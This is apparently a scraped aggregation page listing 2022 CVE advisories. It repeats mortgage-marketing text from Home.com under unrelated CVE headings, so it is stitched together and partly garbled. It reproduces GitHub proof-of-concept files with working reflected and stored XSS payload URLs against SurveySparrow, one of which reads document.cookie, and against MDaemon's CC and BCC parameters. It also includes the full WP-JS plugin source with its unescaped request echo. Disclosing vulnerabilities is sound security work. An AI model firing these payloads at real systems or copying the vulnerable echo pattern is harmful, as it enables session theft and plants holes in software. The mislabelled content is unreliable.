Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['page'] parameter.

**Let's crush this homeownership thing**

**How does it work?**

New to this? No worries. We’ll guide you step by step.

Complete a 1-minute questionnaire

A licensed advisor will be in touch

We'll guide you through the loan process

**Don't Guess.  
Calculate.**

How much home can you afford? Now, you can run real numbers to see where you stand.

*   Enter your unique scenario
*   Adjust your numbers
*   Discover your potential buying power

Calculate your monthly payment

Estimates do not account for all possible costs. Figures and rates are for educational purposes only. Not an offer or commitment to lend.

**Don't Guess.  
Calculate.**

How much home can you afford? Now, you can run real numbers to see where you stand.

*   Enter your unique scenario
*   Adjust your numbers
*   Discover your potential buying power

Calculate your monthly payment

Estimates do not account for all possible costs. Figures and rates are for educational purposes only. Not an offer or commitment to lend.

**What's your real credit score?**

We show you the score that lenders really use.\* Other sites don't.

Sign up for free

\* FICO® Score 4 based on TransUnion data.

Path

**"Loans are what we do, not who we are."****\- Steve Jacobson, Founder & CEO**

**Who we are**

Home.com is part of Fairway Independent Mortgage Corporation, a different kind of mortgage company. Here's our mission as told by Steve Jacobson, CEO:

**What we do**

We put people in homes through flexible, accessible mortgages. But don't take our word for it. Watch this story of Shonn, a first-time, first-generation homebuyer.

**Giving Back**

**147,016****Number of people we helped buy homes in 2021**

**100****Service dogs given to Veterans suffering from PTSD in 2021**

**2,800****Care packages & grants sent to people going through loss**

**Explore Helpful Guides & Topics**

**Recent Articles**

**Subscribe to learn more about homebuying and homeownership**

CVE-2022-28078: Home.com

Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['s'] parameter.

CVE-2022-28077: Home.com

Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.

Permalink

main

Switch branches/tags

**Enterprise-Survey-Software/**Enterprise-Survey-Software 2022****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

18 lines (11 sloc) 452 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: Enterprise-Survey-Software 2022

For Reflected XSS

https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For Stored XSS

Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

now click on signup button

or

visit

https://LOCALHOST/signup?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For demo

https://app.surveysparrow.com/

CVE-2022-29727: Enterprise-Survey-Software/Enterprise-Survey-Software 2022 at main · haxpunk1337/Enterprise-Survey-Software

Permalink

**1** contributor

**Users who have contributed to this file**

Product: Enterprise-Survey-Software 2022

For Reflected XSS

https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For Stored XSS

Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

now click on signup button

or

visit

https://LOCALHOST/signup?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

For demo

https://app.surveysparrow.com/

An Authenticated Reflected Cross-site scripting at BCC Parameter was discovered in MDaemon before 22.0.0 .

Permalink

main

Switch branches/tags

**MDaemon-/**MDaemon XSS at BCC endpoint****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

9 lines (5 sloc) 243 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<session\_cookie>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=GTN&bcc=%22%3E%3Cscript%3Ealert(%27XSS\_TEST\_BY\_GTN%27)%3C/script%3E

XSS executed

CVE-2022-29976: MDaemon-/MDaemon XSS at BCC endpoint at main · haxpunk1337/MDaemon-

Permalink

main

Switch branches/tags

**MDaemon-/**MDaemon XSS at BCC endpoint****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

haxpunk1337 Create MDaemon XSS at BCC endpoint

Latest commit 820ea2b Apr 25, 2022

**History**

**1** contributor

**Users who have contributed to this file**

9 lines (5 sloc) 243 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<session\_cookie>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=GTN&bcc=%22%3E%3Cscript%3Ealert(%27XSS\_TEST\_BY\_GTN%27)%3C/script%3E

XSS executed

An Authenticated Reflected Cross-site scripting at CC Parameter was discovered in MDaemon before 22.0.0 .

Permalink

main

Switch branches/tags

**MDaemon-/**MDaemon XSS at CC endpoint****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

8 lines (5 sloc) 239 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<SESSION\_COOKIE>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=%22%3E%3Cscript%3Ealert(%27XSS\_TEST\_BY\_GTN%27)%3C/script%3E&bcc=

XSS executed

CVE-2022-29975: MDaemon-/MDaemon XSS at CC endpoint at main · haxpunk1337/MDaemon-

Permalink

main

Switch branches/tags

**MDaemon-/**MDaemon XSS at CC endpoint****

Go to file

*   Go to file

*   Copy path
*   Copy permalink

haxpunk1337 Create MDaemon XSS at CC endpoint

Latest commit 1591439 Apr 25, 2022

**History**

**1** contributor

**Users who have contributed to this file**

8 lines (5 sloc) 239 Bytes

Raw Blame

*   Open with Desktop
*   View raw
*   Copy raw contents
*   View blame

Product: MDaemon

Status: Fixed at version 22.0.0

Poc

https://localhost/WorldClient.dll?Session=<SESSION\_COOKIE>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=%22%3E%3Cscript%3Ealert(%27XSS\_TEST\_BY\_GTN%27)%3C/script%3E&bcc=

XSS executed

The WP-JS plugin for WordPress contains a script called wp-js.php with the function wp_js_admin, that accepts unvalidated user input and echoes it back to the user. This can be used for reflected Cross-Site Scripting in versions up to, and including, 2.0.6.

1<?php2/\*3Plugin Name: WP JS4Plugin URI: http://www.halmatferello.com/lab/wp-js/5Description: Automatically GZIP your JS files and applies jsmin algorithm. Also add JavaScript files to specific posts/pages.6Author: Halmat Ferello7Author URI: http://www.halmatferello.com8Version: 2.0.6910Copyright (C) 2008 Halmat Ferello1112Released under the GPL v.2, http://www.gnu.org/copyleft/gpl.html1314This program is distributed in the hope that it will be useful,15but WITHOUT ANY WARRANTY; without even the implied warranty of16MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the17GNU General Public License for more details.18\*/1920include\_once('wp-js-functions.php');2122define('WP\_JS\_VERSION', '2.0.6');23define('WP\_JS\_URL', get\_option('siteurl').'/'.PLUGINDIR.'/wp-js');24define('WP\_JS\_PATH', ABSPATH.PLUGINDIR.'/wp-js');25define('WP\_JS\_CACHE\_PATH', WP\_JS\_PATH.'/cache/');2627define('TEMPLATEURL', get\_theme\_root\_uri().'/'.get\_stylesheet());2829if ( !is\_dir(WP\_JS\_CACHE\_PATH) ) @mkdir(WP\_JS\_CACHE\_PATH);3031if (!defined('WP\_ADMIN')) {32        wp\_js\_setting(array(33                'u' \=> TEMPLATEURL,34                'p' \=> get\_theme\_root().'/'.get\_stylesheet(),35                'c' \=> wp\_js\_cache\_time()36        ));37}3839function wp\_js($file, $echo \= true)40{41        if (!file\_exists(WP\_JS\_CACHE\_PATH.'wp-js-settings.txt')) {42                $url\_array \= array(43                        'c' \=> wp\_js\_cache\_time(),44                        'u' \=> TEMPLATEURL,45                        'p' \=> TEMPLATEPATH46                );47        }48        49        $wp\_js\_attributes \= wp\_js\_url($url\_array);50        51        if (wp\_js\_activation() \== 'on') {52                $string \= get\_settings('siteurl') . '/wp-content/plugins/wp-js/wp-js-compress.php?f=' . $file. $wp\_js\_attributes . '&amp;t='.wp\_js\_modified\_time();53        } else if (wp\_js\_activation() \== 'off') {54                $string \= TEMPLATEURL.'/' . $file;55        }56        57        if ($echo \== true) {58                echo $string;59        } else {60                return $string;61        }62}6364function wp\_js\_url($array)65{66        if (count($array) \> 0) {67                $string \= '';68                foreach ($array as $key \=> $value) {69                        $string .= "&amp;".$key."=".wp\_js\_encode\_string($value);70                }71                return $string;72        } else {73                return FALSE;74        }75}7677function wp\_js\_file\_structure()78{79        $js\_files \= wp\_js\_directory\_map(WP\_JS\_CACHE\_PATH);80        if (count($js\_files) \> 0 && !empty($js\_files)) {81?>82<p>JavaScript files cached (/wp-content/themes/<?php echo get\_stylesheet(); ?>):</p>83<ul>84                <?php foreach ($js\_files as $file): ?>85                <?php86                        $files\_within\_array \= unserialize(file\_get\_contents(WP\_JS\_CACHE\_PATH.$file));87                ?>88                        <li>89                                <?php if (count($files\_within\_array) \> 1): ?><strong>(Grouped)</strong>90                                        <ul>91                                                <?php foreach ($files\_within\_array as $js\_file):?><li\><?php echo $js\_file; ?></li><?php endforeach ?>92                                        </ul>93                                <?php else: ?>94                                        <?php foreach ($files\_within\_array as $js\_file): echo $js\_file;?><?php endforeach ?>95                                <?php endif ?>96                        </li>97                <?php endforeach ?>98</ul>99<?php100        } else {101                echo "<p><strong>No JavaScript files are cached.</strong></p>";102        }103}104105function wp\_js\_admin()106{               107        if ($\_REQUEST\['wp\_js\_clear\_cache'\]) {108                if (wp\_js\_is\_directory\_writable(WP\_JS\_CACHE\_PATH)) {109                        wp\_js\_delete();110                } else {111                        $\_REQUEST\['wp\_js\_message'\] \= 'Unable to clear cache.';112                }113        }114        115        if ($\_REQUEST\['wp\_js\_edit\_expiry'\]) {116                wp\_js\_modified\_time(TRUE);117                update\_option('wp\_js\_cache\_time', $\_REQUEST\['wp\_js\_cache\_time'\]);118        }119        if ($\_REQUEST\['wp\_js\_activation'\]) {120                wp\_js\_activation(true);121        }122        if ($\_REQUEST\['wp\_js\_within\_posts\_activation'\]) {123                wp\_js\_within\_posts\_activation(true);124        }125        126        $cache\_time \= wp\_js\_cache\_time();127128        ?>129        130        <style type="text/css" media="screen">131                fieldset {132                        border: 1px solid #aaa;133                        padding: 12px;134                }135                fieldset#activate-within-posts, fieldset#expiry-time, fieldset#clear-cache {136                        margin-top: 12px;137                }138        </style>139        140        <?php if ($\_REQUEST\['wp\_js\_message'\]) : ?>141                <div id="message" class="updated fade"><p><?php echo $\_REQUEST\['wp\_js\_message'\]; ?></p></div>142        <?php endif; ?>143        144        <div id="wp-js" class="wrap">145                <h2 style="margin: 8px 0; padding-top: 0">WP JS <?php echo WP\_JS\_VERSION; ?></h2>146                147                <p style="color:#1CCD00;">URLs must be relative to your current theme.<br />For example: <code>wp\_js('file.js')</code> = <?php echo TEMPLATEURL; ?>/file.js</p>148                149                <fieldset id="activate"> 150                <legend>Activate</legend>151                <p>Turn the plugin on / off. wp\_js() will still work but no caching or compressing is applied.</p>152                <?php153                echo '<form name="wp\_js\_active" action="'. $\_SERVER\["REQUEST\_URI"\] . '" method="post">';154                if (wp\_js\_activation() \== 'on') {155                        echo '<label for="wp\_js\_activation\_on"><input type="radio" id="wp\_js\_activation\_on" name="wp\_js\_activation" value="on" checked="checked" /> On</label>';156                } else {157                        echo '<label for="wp\_js\_activation\_on"><input type="radio" id="wp\_js\_activation\_on" name="wp\_js\_activation" value="on" /> On</label>';158                }159                if (wp\_js\_activation() \== 'off') {160                        echo ' <label for="wp\_js\_activation\_off"><input type="radio" name="wp\_js\_activation" id="wp\_js\_activation\_off" value="off" checked="checked" /> Off</label><br />';161                } else {162                        echo ' <label for="wp\_js\_activation\_off"><input type="radio" name="wp\_js\_activation" id="wp\_js\_activation\_off" value="off" /> Off</label><br />';163                }164                echo '<div class="submit"><input type="submit" value="Change activation &raquo;" name="wp\_js\_active" /></div>';165                echo '<input type="hidden" name="wp\_js\_message" value="Plugin activation changed.">';166                wp\_nonce\_field('wp-cache');167                echo "</form>\\n";168                ?></fieldset>169                170                171                <fieldset id="activate-within-posts">172                <legend>Activate within posts</legend>173                <p>Allows you to add JavaScript files to specific posts/pages.</p>174                <?php175                echo '<form name="wp\_js\_within\_posts\_activation" action="'. $\_SERVER\["REQUEST\_URI"\] . '" method="post">';176                if (wp\_js\_within\_posts\_activation() \== 'on') {177                        echo '<label for="wp\_js\_within\_posts\_activation\_on"><input type="radio" id="wp\_js\_within\_posts\_activation\_on" name="wp\_js\_within\_posts\_activation" value="on" checked="checked" /> On</label>';178                } else {179                        echo '<label for="wp\_js\_within\_posts\_activation\_on"><input type="radio" id="wp\_js\_within\_posts\_activation\_on" name="wp\_js\_within\_posts\_activation" value="on" /> On</label>';180                }181                if (wp\_js\_within\_posts\_activation() \== 'off') {182                        echo ' <label for="wp\_js\_within\_posts\_activation\_off"><input type="radio" name="wp\_js\_within\_posts\_activation" id="wp\_js\_within\_posts\_activation\_off" value="off" checked="checked" /> Off</label><br />';183                } else {184                        echo ' <label for="wp\_js\_within\_posts\_activation\_off"><input type="radio" name="wp\_js\_within\_posts\_activation" id="wp\_js\_within\_posts\_activation\_off" value="off" /> Off</label><br />';185                }186                echo '<div class="submit"><input type="submit" value="Change activation &raquo;" name="wp\_js\_active" /></div>';187                echo '<input type="hidden" name="wp\_js\_message" value="Plugin within posts activation changed.">';188                wp\_nonce\_field('wp-cache');189                echo "</form>\\n";190                ?></fieldset>191                192                193                <fieldset id="expiry-time">194                <legend>Expiry Time</legend>195                <p>Set the time for when the browser downloads a fresh copy of your JavaScript files.</p>196                <?php197                echo '<form name="wp\_js\_edit\_expiry" action="'. $\_SERVER\["REQUEST\_URI"\] . '" method="post">';198                echo '<label for="wp\_expiry">Expire time:</label> ';199                echo '<input type="text" size="6" name="wp\_js\_cache\_time" value="'.$cache\_time.'" /> seconds<br />';200                echo '<div class="submit"><input type="submit" value="Change expiration &raquo;" name="wp\_js\_edit\_expiry" /></div>';201                echo '<input type="hidden" name="wp\_js\_message" value="Cache expiry changed">';202                wp\_nonce\_field('wp-cache');203                echo "</form>\\n";204                ?></fieldset>205                206                <fieldset id="clear-cache"> 207                <legend>Clear cache</legend>208                209                <?php if (!wp\_js\_is\_directory\_writable(WP\_JS\_CACHE\_PATH)): ?>210                        <p style="border: 1px solid #f00; padding: 2px; color: #f00;"><strong>Cache not available</strong><br/>The <code>wp-js</code> folder <strong>is not writable</strong>. Please change the plugin folder permissions to <code>777</code>.</p>211                <?php endif ?>212                213                <p>Clear your cache if you have updated your JavaScript files.</p>214                <?php wp\_js\_file\_structure(); ?>215                <?php216                echo '<form name="wp\_js\_clear\_cache" action="'. $\_SERVER\["REQUEST\_URI"\] . '" method="post">';217                echo '<div class="submit"><input type="submit" value="Clear Cache" name="wp\_js\_clear\_cache" /></div>';218                echo '<input type="hidden" name="wp\_js\_message" value="Cached cleared">';219                wp\_nonce\_field('wp-cache');220                echo "</form>\\n";221                ?></fieldset>222        </div><?php223}224225 // Admin Panel   226function wp\_js\_add\_pages()227{228        add\_options\_page('WP JS options', 'WP JS', 8, \_\_FILE\_\_, 'wp\_js\_admin');            229}230231// Add Options Page232add\_action('admin\_menu', 'wp\_js\_add\_pages');233234if (wp\_js\_within\_posts\_activation() \== 'on') {235        include\_once('wp-js-files-list.php');236}237238239?>

CVE-2022-1567: wp-js.php in wp-js/trunk – WordPress Plugin Repository

The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.

Tag

#xss